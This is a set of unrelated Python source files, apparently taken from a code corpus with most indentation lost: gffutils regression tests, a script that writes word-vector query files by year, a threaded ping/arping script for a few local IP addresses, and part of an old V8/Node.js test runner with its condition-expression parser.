chr1\t.\tgene\t1\t2\t.\t-\t.\tID=d;Note=%2C;
chr1\t.\tgene\t1\t2\t.\t-\t.\tID=e;Note=%2C;
chr1\t.\tgene\t1\t2\t.\t-\t.\tID=f;Note=%2C;
''')
tmp = tempfile.NamedTemporaryFile(delete=False).name
with open(tmp, 'w') as fout:
fout.write(s + '\n')
db = gffutils.create_db(tmp, ':memory:', checklines=1)
assert db['a']['Note'] == [',']
assert db['b']['Note'] == [',']
assert db['c']['Note'] == [',']
assert db['d']['Note'] == [',']
assert db['e']['Note'] == [',']
assert db['f']['Note'] == [',']
def test_issue_105():
fn = gffutils.example_filename('FBgn0031208.gtf')
home = os.path.expanduser('~')
newfn = os.path.join(home, '.gffutils.test')
with open(newfn, 'w') as fout:
fout.write(open(fn).read())
f = gffutils.iterators.DataIterator(newfn)
for i in f:
pass
os.unlink(newfn)
def test_issue_107():
s = dedent(
'''
chr1\t.\tgene\t10\t15\t.\t+\t.\tID=b;
chr1\t.\tgene\t1\t5\t.\t-\t.\tID=a;
chr2\t.\tgene\t25\t50\t.\t-\t.\tID=c;
chr2\t.\tgene\t55\t60\t.\t-\t.\tID=d;
''')
tmp = tempfile.NamedTemporaryFile(delete=False).name
with open(tmp, 'w') as fout:
fout.write(s + '\n')
db = gffutils.create_db(tmp, ':memory:')
interfeatures = list(db.interfeatures(
db.features_of_type('gene', order_by=('seqid', 'start'))))
assert [str(i) for i in interfeatures] == [
'chr1\tgffutils_derived\tinter_gene_gene\t6\t9\t.\t.\t.\tID=a,b;',
'chr2\tgffutils_derived\tinter_gene_gene\t16\t54\t.\t-\t.\tID=c,d;',
]
def test_issue_119():
# First file has these two exons with no ID:
#
# chr2L FlyBase exon 8193 8589 . + . Parent=FBtr0300690
# chr2L FlyBase exon 7529 8116 . + . Name=CG11023:1;Parent=FBtr0300689,FBtr0300690
#
db0 = gffutils.create_db(gffutils.example_filename('FBgn0031208.gff'),':memory:')
# And this one, a bunch of reads with no IDs anywhere
db1 = gffutils.create_db(gffutils.example_filename('F3-unique-3.v2.gff'),':memory:')
# When db1 is updated by db0
db2 = db1.update(db0)
assert (
db2._autoincrements
== db1._autoincrements
== {'exon': 2, 'read': 112}
), db2._autoincrements
assert len(list(db0.features_of_type('exon'))) == 6
# Now we update that with db0 again
db3 = db2.update(db0, merge_strategy='replace')
# Using the "replace" strategy, we should have only gotten another 2 exons
assert len(list(db3.features_of_type('exon'))) == 8
# Make sure that the autoincrements for exons jumped by 2
assert (
db2._autoincrements
== db3._autoincrements
== {'exon': 4, 'read': 112}
), db2._autoincrements
# More isolated test, merging two databases each created from the same file
# which itself contains only a single feature with no ID.
tmp = tempfile.NamedTemporaryFile(delete=False).name
with open(tmp, 'w') as fout:
fout.write('chr1\t.\tgene\t10\t15\t.\t+\t.\t\n')
db4 = gffutils.create_db(tmp, tmp + '.db')
db5 = gffutils.create_db(tmp, ':memory:')
assert db4._autoincrements == {'gene': 1}
assert db5._autoincrements == {'gene': 1}
db6 = db4.update(db5)
db7 = gffutils.FeatureDB(db4.dbfn)
# both db4 and db6 should now have the same, updated autoincrements because
# they both point to the same db.
assert db6._autoincrements == db4._autoincrements == {'gene': 2}
# But db5 was created independently and should have unchanged autoincrements
assert db5._autoincrements == {'gene': 1}
# db7 was created from the database pointed to by both db4 and db6. This
# tests that when a FeatureDB is created it should have the
# correctly-updated autoincrements read from the db
assert db7._autoincrements == {'gene': 2}
def test_pr_131():
db = gffutils.create_db(gffutils.example_filename('FBgn0031208.gff'),':memory:')
# previously would raise ValueError("No lines parsed -- was an empty
# file provided?"); now just does nothing
db2 = db.update([])
def test_pr_133():
# Previously, merge_attributes would not deep-copy the values from the
# second dict, and when the values are then modified, the second dict is
# unintentionally modified.
d1 = {'a': [1]}
d2 = {'a': [2]}
d1a = {'a': [1]}
d2a = {'a': [2]}
d3 = gffutils.helpers.merge_attributes(d1, d2)
assert d1 == d1a, d1
assert d2 == d2a, d2
def test_pr_139():
db = gffutils.create_db(gffutils.example_filename('FBgn0031208.gff'),':memory:')
exons = list(db.features_of_type('exon'))
inter = list(db.interfeatures(exons))
# previously, the first exon's attributes would show up in subsequent merged features
assert exons[0].attributes['Name'][0] not in inter[1].attributes['Name']
assert exons[0].attributes['Name'][0] not in inter[2].attributes['Name']
assert exons[0].attributes['Name'][0] not in inter[3].attributes['Name']
def test_pr_144():
# previously this would fail with:
# UnboundLocalError: local variable 'part' referenced before assignment
f = gffutils.Feature(attributes={'a': ['']})
# Make sure everything got converted correctly
assert f.attributes['a'] == ['']
assert str(f) == ". . . . . . . . a"
g = gffutils.feature.feature_from_line(str(f))
assert g == f
if __name__ == "__main__":
# this test case fails
#test_attributes_modify()
#test_sanitize_gff()
#test_random_chr()
#test_nonascii()
test_iterator_update()
|
setupqueries4years.py
|
from multiprocessing import Queue, Process
from argparse import ArgumentParser
import ioutils
"""
setup queries file to be used in printing word vectors for years
"""
SAVE_FILE = "{year:d}-query.txt"
FULL_RANGE_SAVE_FILE = "{year1:d}-{year2:d}-query.txt"
def worker(proc_num, queue, out_dir, target_lists):
while True:
if queue.empty():
break
year = queue.get()
print proc_num, "Setting queries for year ..", year
with open(out_dir + SAVE_FILE.format(year=year), "w") as fp:
for word in target_lists[year]:
print >>fp, word.encode("utf-8")
def run_parallel(workers, years, out_dir, target_lists):
queue = Queue()
for year in years:
queue.put(year)
procs = [Process(target=worker, args=[i, queue, out_dir, target_lists]) for i in range(workers)]
for p in procs:
p.start()
for p in procs:
p.join()
full_word_set = set([])
for year_words in target_lists.itervalues():
full_word_set = full_word_set.union(set(year_words))
with open(out_dir + FULL_RANGE_SAVE_FILE.format(year1=years[0], year2=years[-1]), "w") as fp:
for word in full_word_set:
print >>fp, word.encode("utf-8")
if __name__ == "__main__":
parser = ArgumentParser("Setup queries file given range of years and word-list contains target words")
parser.add_argument("out_dir", help="output path")
parser.add_argument("word_file", help="path to sorted word file (target word list)")
parser.add_argument("--workers", type=int, help="Number of processes to spawn", default=20)
parser.add_argument("--target-words", type=int, help="Number of words (of decreasing average frequency) to analyze", default=-1)
parser.add_argument("--start-year", type=int, help="start year (inclusive)", default=1800)
parser.add_argument("--end-year", type=int, help="end year (inclusive)", default=1990)
parser.add_argument("--year-inc", type=int, help="year increment", default=10)
args = parser.parse_args()
years = range(args.start_year, args.end_year + 1, args.year_inc)
target_lists, context_lists = ioutils.load_target_context_words(years, args.word_file, args.target_words, -1)
ioutils.mkdir(args.out_dir)
run_parallel(args.workers, years, args.out_dir + "/", target_lists)
|
ping_thread_arp.py
|
#!/usr/bin/env python
from threading import Thread
import subprocess
from queue import Queue
import re
num_ping_threads = 3
num_arp_threads = 3
in_queue = Queue()
out_queue = Queue()
ips = ["10.0.1.1", "10.0.1.3", "10.0.1.11", "10.0.1.51"]
def pinger(i, iq, oq):
"""Pings subnet"""
while True:
ip = iq.get()
print("Thread %s: Pinging %s" % (i, ip))
ret = subprocess.call("ping -c 1 %s" % ip,
shell=True,
stdout=open('/dev/null', 'w'),
stderr=subprocess.STDOUT)
if ret == 0:
#print "%s: is alive" % ip
#place valid ip address in next queue
oq.put(ip)
else:
print("%s: did not respond" % ip)
iq.task_done()
def arping(i, oq):
"""grabs a valid IP address from a queue and gets macaddr"""
while True:
ip = oq.get()
print("Thread %s: Pinging %s" % (i, ip))
p = subprocess.Popen("arping -c 1 %s" % ip,
shell=True,
stdout=subprocess.PIPE)
        out = p.stdout.read().decode()
#match and extract mac address from stdout
result = out.split()
pattern = re.compile(":")
macaddr = None
for item in result:
if re.search(pattern, item):
macaddr = item
print("IP Address: %s | Mac Address: %s " % (ip, macaddr))
oq.task_done()
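# Illustrative sketch (not part of the original script): pulling the MAC
# address out of arping output with an explicit MAC pattern instead of
# accepting any whitespace-separated token that contains a colon.
MAC_RE = re.compile(r"(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}")
def extract_mac(arping_output):
    match = MAC_RE.search(arping_output)
    return match.group(0) if match else None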
#Place ip addresses into in queue
for ip in ips:
in_queue.put(ip)
#spawn pool of ping threads
for i in range(num_ping_threads):
worker = Thread(target=pinger, args=(i, in_queue, out_queue))
    worker.daemon = True
worker.start()
#spawn pool of arping threads
for i in range(num_arp_threads):
worker = Thread(target=arping, args=(i, out_queue))
    worker.daemon = True
worker.start()
print("Main Thread Waiting")
#ensures that program does not exit until both queues have been emptied
in_queue.join()
out_queue.join()
print("Done")
# Multiple queues feeding multiple thread pools: ping each IP address, then look up its MAC.
# The address list flows through thread pool 1 and thread pool 2, blocking on both queues at the end.
|
test.py
|
#!/usr/bin/env python
#
# Copyright 2008 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import imp
import optparse
import os
from os.path import join, dirname, abspath, basename, isdir, exists
import platform
import re
import signal
import subprocess
import sys
import tempfile
import time
import threading
from Queue import Queue, Empty
sys.path.append(dirname(__file__) + "/../deps/v8/tools")
import utils
VERBOSE = False
# ---------------------------------------------
# --- P r o g r e s s I n d i c a t o r s ---
# ---------------------------------------------
class ProgressIndicator(object):
def __init__(self, cases):
self.cases = cases
self.queue = Queue(len(cases))
for case in cases:
self.queue.put_nowait(case)
self.succeeded = 0
self.remaining = len(cases)
self.total = len(cases)
self.failed = [ ]
self.crashed = 0
self.terminate = False
self.lock = threading.Lock()
def PrintFailureHeader(self, test):
if test.IsNegative():
negative_marker = '[negative] '
else:
negative_marker = ''
print "=== %(label)s %(negative)s===" % {
'label': test.GetLabel(),
'negative': negative_marker
}
print "Path: %s" % "/".join(test.path)
def Run(self, tasks):
self.Starting()
threads = []
# Spawn N-1 threads and then use this thread as the last one.
# That way -j1 avoids threading altogether which is a nice fallback
# in case of threading problems.
for i in xrange(tasks - 1):
thread = threading.Thread(target=self.RunSingle, args=[])
threads.append(thread)
thread.start()
try:
self.RunSingle()
# Wait for the remaining threads
for thread in threads:
# Use a timeout so that signals (ctrl-c) will be processed.
thread.join(timeout=10000000)
except Exception, e:
# If there's an exception we schedule an interruption for any
# remaining threads.
self.terminate = True
# ...and then reraise the exception to bail out
raise
self.Done()
return not self.failed
def RunSingle(self):
while not self.terminate:
try:
test = self.queue.get_nowait()
except Empty:
return
case = test.case
self.lock.acquire()
self.AboutToRun(case)
self.lock.release()
try:
start = time.time()
output = case.Run()
case.duration = (time.time() - start)
except IOError, e:
assert self.terminate
return
if self.terminate:
return
self.lock.acquire()
if output.UnexpectedOutput():
self.failed.append(output)
if output.HasCrashed():
self.crashed += 1
else:
self.succeeded += 1
self.remaining -= 1
self.HasRun(output)
self.lock.release()
def EscapeCommand(command):
parts = []
for part in command:
if ' ' in part:
# Escape spaces. We may need to escape more characters for this
# to work properly.
parts.append('"%s"' % part)
else:
parts.append(part)
return " ".join(parts)
class SimpleProgressIndicator(ProgressIndicator):
def Starting(self):
print 'Running %i tests' % len(self.cases)
def Done(self):
print
for failed in self.failed:
self.PrintFailureHeader(failed.test)
if failed.output.stderr:
print "--- stderr ---"
print failed.output.stderr.strip()
if failed.output.stdout:
print "--- stdout ---"
print failed.output.stdout.strip()
print "Command: %s" % EscapeCommand(failed.command)
if failed.HasCrashed():
print "--- CRASHED ---"
if failed.HasTimedOut():
print "--- TIMEOUT ---"
if len(self.failed) == 0:
print "==="
print "=== All tests succeeded"
print "==="
else:
print
print "==="
print "=== %i tests failed" % len(self.failed)
if self.crashed > 0:
print "=== %i tests CRASHED" % self.crashed
print "==="
class VerboseProgressIndicator(SimpleProgressIndicator):
def AboutToRun(self, case):
print 'Starting %s...' % case.GetLabel()
sys.stdout.flush()
def HasRun(self, output):
if output.UnexpectedOutput():
if output.HasCrashed():
outcome = 'CRASH'
else:
outcome = 'FAIL'
else:
outcome = 'pass'
print 'Done running %s: %s' % (output.test.GetLabel(), outcome)
class DotsProgressIndicator(SimpleProgressIndicator):
def AboutToRun(self, case):
pass
def HasRun(self, output):
total = self.succeeded + len(self.failed)
if (total > 1) and (total % 50 == 1):
sys.stdout.write('\n')
if output.UnexpectedOutput():
if output.HasCrashed():
sys.stdout.write('C')
sys.stdout.flush()
elif output.HasTimedOut():
sys.stdout.write('T')
sys.stdout.flush()
else:
sys.stdout.write('F')
sys.stdout.flush()
else:
sys.stdout.write('.')
sys.stdout.flush()
class CompactProgressIndicator(ProgressIndicator):
def __init__(self, cases, templates):
super(CompactProgressIndicator, self).__init__(cases)
self.templates = templates
self.last_status_length = 0
self.start_time = time.time()
def Starting(self):
pass
def Done(self):
self.PrintProgress('Done')
def AboutToRun(self, case):
self.PrintProgress(case.GetLabel())
def HasRun(self, output):
if output.UnexpectedOutput():
self.ClearLine(self.last_status_length)
self.PrintFailureHeader(output.test)
stdout = output.output.stdout.strip()
if len(stdout):
print self.templates['stdout'] % stdout
stderr = output.output.stderr.strip()
if len(stderr):
print self.templates['stderr'] % stderr
print "Command: %s" % EscapeCommand(output.command)
if output.HasCrashed():
print "--- CRASHED ---"
if output.HasTimedOut():
print "--- TIMEOUT ---"
def Truncate(self, str, length):
if length and (len(str) > (length - 3)):
return str[:(length-3)] + "..."
else:
return str
def PrintProgress(self, name):
self.ClearLine(self.last_status_length)
elapsed = time.time() - self.start_time
status = self.templates['status_line'] % {
'passed': self.succeeded,
'remaining': (((self.total - self.remaining) * 100) // self.total),
'failed': len(self.failed),
'test': name,
'mins': int(elapsed) / 60,
'secs': int(elapsed) % 60
}
status = self.Truncate(status, 78)
self.last_status_length = len(status)
print status,
sys.stdout.flush()
class ColorProgressIndicator(CompactProgressIndicator):
def __init__(self, cases):
templates = {
'status_line': "[%(mins)02i:%(secs)02i|\033[34m%%%(remaining) 4d\033[0m|\033[32m+%(passed) 4d\033[0m|\033[31m-%(failed) 4d\033[0m]: %(test)s",
'stdout': "\033[1m%s\033[0m",
'stderr': "\033[31m%s\033[0m",
}
super(ColorProgressIndicator, self).__init__(cases, templates)
def ClearLine(self, last_line_length):
print "\033[1K\r",
class MonochromeProgressIndicator(CompactProgressIndicator):
def __init__(self, cases):
templates = {
'status_line': "[%(mins)02i:%(secs)02i|%%%(remaining) 4d|+%(passed) 4d|-%(failed) 4d]: %(test)s",
'stdout': '%s',
'stderr': '%s',
'clear': lambda last_line_length: ("\r" + (" " * last_line_length) + "\r"),
'max_length': 78
}
super(MonochromeProgressIndicator, self).__init__(cases, templates)
def ClearLine(self, last_line_length):
print ("\r" + (" " * last_line_length) + "\r"),
PROGRESS_INDICATORS = {
'verbose': VerboseProgressIndicator,
'dots': DotsProgressIndicator,
'color': ColorProgressIndicator,
'mono': MonochromeProgressIndicator
}
# -------------------------
# --- F r a m e w o r k ---
# -------------------------
class CommandOutput(object):
def __init__(self, exit_code, timed_out, stdout, stderr):
self.exit_code = exit_code
self.timed_out = timed_out
self.stdout = stdout
self.stderr = stderr
self.failed = None
class TestCase(object):
def __init__(self, context, path, mode):
self.path = path
self.context = context
self.duration = None
self.mode = mode
def IsNegative(self):
return False
def CompareTime(self, other):
return cmp(other.duration, self.duration)
def DidFail(self, output):
if output.failed is None:
output.failed = self.IsFailureOutput(output)
return output.failed
def IsFailureOutput(self, output):
return output.exit_code != 0
def GetSource(self):
return "(no source available)"
def RunCommand(self, command):
full_command = self.context.processor(command)
output = Execute(full_command,
self.context,
self.context.GetTimeout(self.mode))
self.Cleanup()
return TestOutput(self,
full_command,
output,
self.context.store_unexpected_output)
def BeforeRun(self):
pass
def AfterRun(self, result):
pass
def Run(self):
self.BeforeRun()
result = None
try:
result = self.RunCommand(self.GetCommand())
finally:
self.AfterRun(result)
return result
def Cleanup(self):
return
class TestOutput(object):
def __init__(self, test, command, output, store_unexpected_output):
self.test = test
self.command = command
self.output = output
self.store_unexpected_output = store_unexpected_output
def UnexpectedOutput(self):
if self.HasCrashed():
outcome = CRASH
elif self.HasTimedOut():
outcome = TIMEOUT
elif self.HasFailed():
outcome = FAIL
else:
outcome = PASS
return not outcome in self.test.outcomes
def HasPreciousOutput(self):
return self.UnexpectedOutput() and self.store_unexpected_output
def HasCrashed(self):
if utils.IsWindows():
return 0x80000000 & self.output.exit_code and not (0x3FFFFF00 & self.output.exit_code)
else:
# Timed out tests will have exit_code -signal.SIGTERM.
if self.output.timed_out:
return False
return self.output.exit_code < 0 and \
self.output.exit_code != -signal.SIGABRT
def HasTimedOut(self):
return self.output.timed_out
def HasFailed(self):
execution_failed = self.test.DidFail(self.output)
if self.test.IsNegative():
return not execution_failed
else:
return execution_failed
def KillProcessWithID(pid):
if utils.IsWindows():
os.popen('taskkill /T /F /PID %d' % pid)
else:
os.kill(pid, signal.SIGTERM)
MAX_SLEEP_TIME = 0.1
INITIAL_SLEEP_TIME = 0.0001
SLEEP_TIME_FACTOR = 1.25
SEM_INVALID_VALUE = -1
SEM_NOGPFAULTERRORBOX = 0x0002 # Microsoft Platform SDK WinBase.h
def Win32SetErrorMode(mode):
prev_error_mode = SEM_INVALID_VALUE
try:
import ctypes
prev_error_mode = ctypes.windll.kernel32.SetErrorMode(mode)
except ImportError:
pass
return prev_error_mode
def RunProcess(context, timeout, args, **rest):
if context.verbose: print "#", " ".join(args)
popen_args = args
prev_error_mode = SEM_INVALID_VALUE
if utils.IsWindows():
popen_args = '"' + subprocess.list2cmdline(args) + '"'
if context.suppress_dialogs:
# Try to change the error mode to avoid dialogs on fatal errors. Don't
# touch any existing error mode flags by merging the existing error mode.
# See http://blogs.msdn.com/oldnewthing/archive/2004/07/27/198410.aspx.
error_mode = SEM_NOGPFAULTERRORBOX
prev_error_mode = Win32SetErrorMode(error_mode)
Win32SetErrorMode(error_mode | prev_error_mode)
process = subprocess.Popen(
shell = utils.IsWindows(),
args = popen_args,
**rest
)
if utils.IsWindows() and context.suppress_dialogs and prev_error_mode != SEM_INVALID_VALUE:
Win32SetErrorMode(prev_error_mode)
# Compute the end time - if the process crosses this limit we
# consider it timed out.
if timeout is None: end_time = None
else: end_time = time.time() + timeout
timed_out = False
# Repeatedly check the exit code from the process in a
# loop and keep track of whether or not it times out.
exit_code = None
sleep_time = INITIAL_SLEEP_TIME
while exit_code is None:
if (not end_time is None) and (time.time() >= end_time):
# Kill the process and wait for it to exit.
KillProcessWithID(process.pid)
exit_code = process.wait()
timed_out = True
else:
exit_code = process.poll()
time.sleep(sleep_time)
sleep_time = sleep_time * SLEEP_TIME_FACTOR
if sleep_time > MAX_SLEEP_TIME:
sleep_time = MAX_SLEEP_TIME
return (process, exit_code, timed_out)
def PrintError(str):
sys.stderr.write(str)
sys.stderr.write('\n')
def CheckedUnlink(name):
try:
os.unlink(name)
except OSError, e:
PrintError("os.unlink() " + str(e))
def Execute(args, context, timeout=None):
(fd_out, outname) = tempfile.mkstemp()
(fd_err, errname) = tempfile.mkstemp()
(process, exit_code, timed_out) = RunProcess(
context,
timeout,
args = args,
stdout = fd_out,
stderr = fd_err,
)
os.close(fd_out)
os.close(fd_err)
output = file(outname).read()
errors = file(errname).read()
CheckedUnlink(outname)
CheckedUnlink(errname)
return CommandOutput(exit_code, timed_out, output, errors)
def ExecuteNoCapture(args, context, timeout=None):
(process, exit_code, timed_out) = RunProcess(
context,
timeout,
args = args,
)
return CommandOutput(exit_code, False, "", "")
def CarCdr(path):
if len(path) == 0:
return (None, [ ])
else:
return (path[0], path[1:])
class TestConfiguration(object):
def __init__(self, context, root):
self.context = context
self.root = root
def Contains(self, path, file):
if len(path) > len(file):
return False
for i in xrange(len(path)):
if not path[i].match(file[i]):
return False
return True
def GetTestStatus(self, sections, defs):
pass
class TestSuite(object):
def __init__(self, name):
self.name = name
def GetName(self):
return self.name
# Use this to run several variants of the tests, e.g.:
# VARIANT_FLAGS = [[], ['--always_compact', '--noflush_code']]
VARIANT_FLAGS = [[]]
class TestRepository(TestSuite):
def __init__(self, path):
normalized_path = abspath(path)
super(TestRepository, self).__init__(basename(normalized_path))
self.path = normalized_path
self.is_loaded = False
self.config = None
def GetConfiguration(self, context):
if self.is_loaded:
return self.config
self.is_loaded = True
file = None
try:
(file, pathname, description) = imp.find_module('testcfg', [ self.path ])
module = imp.load_module('testcfg', file, pathname, description)
self.config = module.GetConfiguration(context, self.path)
finally:
if file:
file.close()
return self.config
def GetBuildRequirements(self, path, context):
return self.GetConfiguration(context).GetBuildRequirements()
def AddTestsToList(self, result, current_path, path, context, mode):
for v in VARIANT_FLAGS:
tests = self.GetConfiguration(context).ListTests(current_path, path, mode)
for t in tests: t.variant_flags = v
result += tests
def GetTestStatus(self, context, sections, defs):
self.GetConfiguration(context).GetTestStatus(sections, defs)
class LiteralTestSuite(TestSuite):
def __init__(self, tests):
super(LiteralTestSuite, self).__init__('root')
self.tests = tests
def GetBuildRequirements(self, path, context):
(name, rest) = CarCdr(path)
result = [ ]
for test in self.tests:
if not name or name.match(test.GetName()):
result += test.GetBuildRequirements(rest, context)
return result
def ListTests(self, current_path, path, context, mode):
(name, rest) = CarCdr(path)
result = [ ]
for test in self.tests:
test_name = test.GetName()
if not name or name.match(test_name):
full_path = current_path + [test_name]
test.AddTestsToList(result, full_path, path, context, mode)
return result
def GetTestStatus(self, context, sections, defs):
for test in self.tests:
test.GetTestStatus(context, sections, defs)
SUFFIX = {
'debug' : '_g',
'release' : '' }
FLAGS = {
'debug' : ['--enable-slow-asserts', '--debug-code', '--verify-heap'],
'release' : []}
TIMEOUT_SCALEFACTOR = {
'debug' : 4,
'release' : 1 }
class Context(object):
def __init__(self, workspace, buildspace, verbose, vm, timeout, processor, suppress_dialogs, store_unexpected_output):
self.workspace = workspace
self.buildspace = buildspace
self.verbose = verbose
self.vm_root = vm
self.timeout = timeout
self.processor = processor
self.suppress_dialogs = suppress_dialogs
self.store_unexpected_output = store_unexpected_output
def GetVm(self, mode):
if mode == 'debug':
name = 'build/debug/node_g'
else:
name = 'build/default/node'
if utils.IsWindows() and not name.endswith('.exe'):
name = os.path.abspath(name + '.exe')
return name
def GetVmCommand(self, testcase, mode):
return [self.GetVm(mode)] + self.GetVmFlags(testcase, mode)
def GetVmFlags(self, testcase, mode):
return testcase.variant_flags + FLAGS[mode]
def GetTimeout(self, mode):
return self.timeout * TIMEOUT_SCALEFACTOR[mode]
def RunTestCases(cases_to_run, progress, tasks):
progress = PROGRESS_INDICATORS[progress](cases_to_run)
return progress.Run(tasks)
def BuildRequirements(context, requirements, mode, scons_flags):
command_line = (['scons', '-Y', context.workspace, 'mode=' + ",".join(mode)]
+ requirements
+ scons_flags)
output = ExecuteNoCapture(command_line, context)
return output.exit_code == 0
# -------------------------------------------
# --- T e s t C o n f i g u r a t i o n ---
# -------------------------------------------
SKIP = 'skip'
FAIL = 'fail'
PASS = 'pass'
OKAY = 'okay'
TIMEOUT = 'timeout'
CRASH = 'crash'
SLOW = 'slow'
class Expression(object):
pass
class Constant(Expression):
def __init__(self, value):
self.value = value
def Evaluate(self, env, defs):
return self.value
class Variable(Expression):
def __init__(self, name):
self.name = name
def GetOutcomes(self, env, defs):
if self.name in env: return ListSet([env[self.name]])
else: return Nothing()
class Outcome(Expression):
def __init__(self, name):
self.name = name
def GetOutcomes(self, env, defs):
if self.name in defs:
return defs[self.name].GetOutcomes(env, defs)
else:
return ListSet([self.name])
class Set(object):
pass
class ListSet(Set):
def __init__(self, elms):
self.elms = elms
def __str__(self):
return "ListSet%s" % str(self.elms)
def Intersect(self, that):
if not isinstance(that, ListSet):
return that.Intersect(self)
return ListSet([ x for x in self.elms if x in that.elms ])
def Union(self, that):
if not isinstance(that, ListSet):
return that.Union(self)
return ListSet(self.elms + [ x for x in that.elms if x not in self.elms ])
def IsEmpty(self):
return len(self.elms) == 0
class Everything(Set):
def Intersect(self, that):
return that
def Union(self, that):
return self
def IsEmpty(self):
return False
class Nothing(Set):
def Intersect(self, that):
return self
def Union(self, that):
return that
def IsEmpty(self):
return True
class Operation(Expression):
def __init__(self, left, op, right):
self.left = left
self.op = op
self.right = right
def Evaluate(self, env, defs):
if self.op == '||' or self.op == ',':
return self.left.Evaluate(env, defs) or self.right.Evaluate(env, defs)
elif self.op == 'if':
return False
elif self.op == '==':
inter = self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs))
return not inter.IsEmpty()
else:
assert self.op == '&&'
return self.left.Evaluate(env, defs) and self.right.Evaluate(env, defs)
def GetOutcomes(self, env, defs):
if self.op == '||' or self.op == ',':
return self.left.GetOutcomes(env, defs).Union(self.right.GetOutcomes(env, defs))
elif self.op == 'if':
if self.right.Evaluate(env, defs): return self.left.GetOutcomes(env, defs)
else: return Nothing()
else:
assert self.op == '&&'
return self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs))
def IsAlpha(str):
for char in str:
if not (char.isalpha() or char.isdigit() or char == '_'):
return False
return True
class Tokenizer(object):
"""A simple string tokenizer that chops expressions into variables,
parens and operators"""
def __init__(self, expr):
self.index = 0
self.expr = expr
self.length = len(expr)
self.tokens = None
def Current(self, length = 1):
if not self.HasMore(length): return ""
return self.expr[self.index:self.index+length]
def HasMore(self, length = 1):
return self.index < self.length + (length - 1)
def Advance(self, count = 1):
self.index = self.index + count
def AddToken(self, token):
self.tokens.append(token)
def SkipSpaces(self):
while self.HasMore() and self.Current().isspace():
self.Advance()
def Tokenize(self):
self.tokens = [ ]
while self.HasMore():
self.SkipSpaces()
if not self.HasMore():
return None
if self.Current() == '(':
self.AddToken('(')
self.Advance()
elif self.Current() == ')':
self.AddToken(')')
self.Advance()
elif self.Current() == '$':
self.AddToken('$')
self.Advance()
elif self.Current() == ',':
self.AddToken(',')
self.Advance()
elif IsAlpha(self.Current()):
buf = ""
while self.HasMore() and IsAlpha(self.Current()):
buf += self.Current()
self.Advance()
self.AddToken(buf)
elif self.Current(2) == '&&':
self.AddToken('&&')
self.Advance(2)
elif self.Current(2) == '||':
self.AddToken('||')
self.Advance(2)
elif self.Current(2) == '==':
self.AddToken('==')
self.Advance(2)
else:
return None
return self.tokens
class Scanner(object):
"""A simple scanner that can serve out tokens from a given list"""
def __init__(self, tokens):
self.tokens = tokens
self.length = len(tokens)
self.index = 0
def HasMore(self):
return self.index < self.length
def Current(self):
return self.tokens[self.index]
def Advance(self):
self.index = self.index + 1
def ParseAtomicExpression(scan):
if scan.Current() == "true":
scan.Advance()
return Constant(True)
elif scan.Current() == "false":
scan.Advance()
return Constant(False)
elif IsAlpha(scan.Current()):
name = scan.Current()
scan.Advance()
return Outcome(name.lower())
elif scan.Current() == '$':
scan.Advance()
if not IsAlpha(scan.Current()):
return None
name = scan.Current()
scan.Advance()
return Variable(name.lower())
elif scan.Current() == '(':
scan.Advance()
result = ParseLogicalExpression(scan)
if (not result) or (scan.Current() != ')'):
return None
scan.Advance()
return result
else:
return None
BINARIES = ['==']
def ParseOperatorExpression(scan):
left = ParseAtomicExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() in BINARIES):
op = scan.Current()
scan.Advance()
right = ParseOperatorExpression(scan)
if not right:
return None
left = Operation(left, op, right)
return left
def ParseConditionalExpression(scan):
left = ParseOperatorExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() == 'if'):
scan.Advance()
right = ParseOperatorExpression(scan)
if not right:
return None
left = Operation(left, 'if', right)
return left
LOGICALS = ["&&", "||", ","]
def ParseLogicalExpression(scan):
left = ParseConditionalExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() in LOGICALS):
op = scan.Current()
scan.Advance()
right = ParseConditionalExpression(scan)
if not right:
return None
left = Operation(left, op, right)
return left
def ParseCondition(expr):
"""Parses a logical expression into an Expression object"""
tokens = Tokenizer(expr).Tokenize()
if not tokens:
print "Malformed expression: '%s'" % expr
return None
scan = Scanner(tokens)
ast = ParseLogicalExpression(scan)
if not ast:
print "Malformed expression: '%s'" % expr
return None
if scan.HasMore():
print "Malformed expression: '%s'" % expr
return None
return ast
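# Illustrative only (not from the original file): the grammar implemented above
# accepts expressions over $variables and outcome names, for example
#   ParseCondition('$mode == debug')
#   ParseCondition('PASS || TIMEOUT if $system == windows')
#   ParseCondition('($arch == x64) && ($mode == release)')
# Each call returns an Expression tree (Operation/Outcome/Variable/Constant),
# or None when the input is malformed.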
class ClassifiedTest(object):
def __init__(self, case, outcomes):
self.case = case
self.outcomes = outcomes
class Configuration(object):
"""The parsed contents of a configuration file"""
def __init__(self, sections, defs):
self.sections = sections
self.defs = defs
def ClassifyTests(self, cases, env):
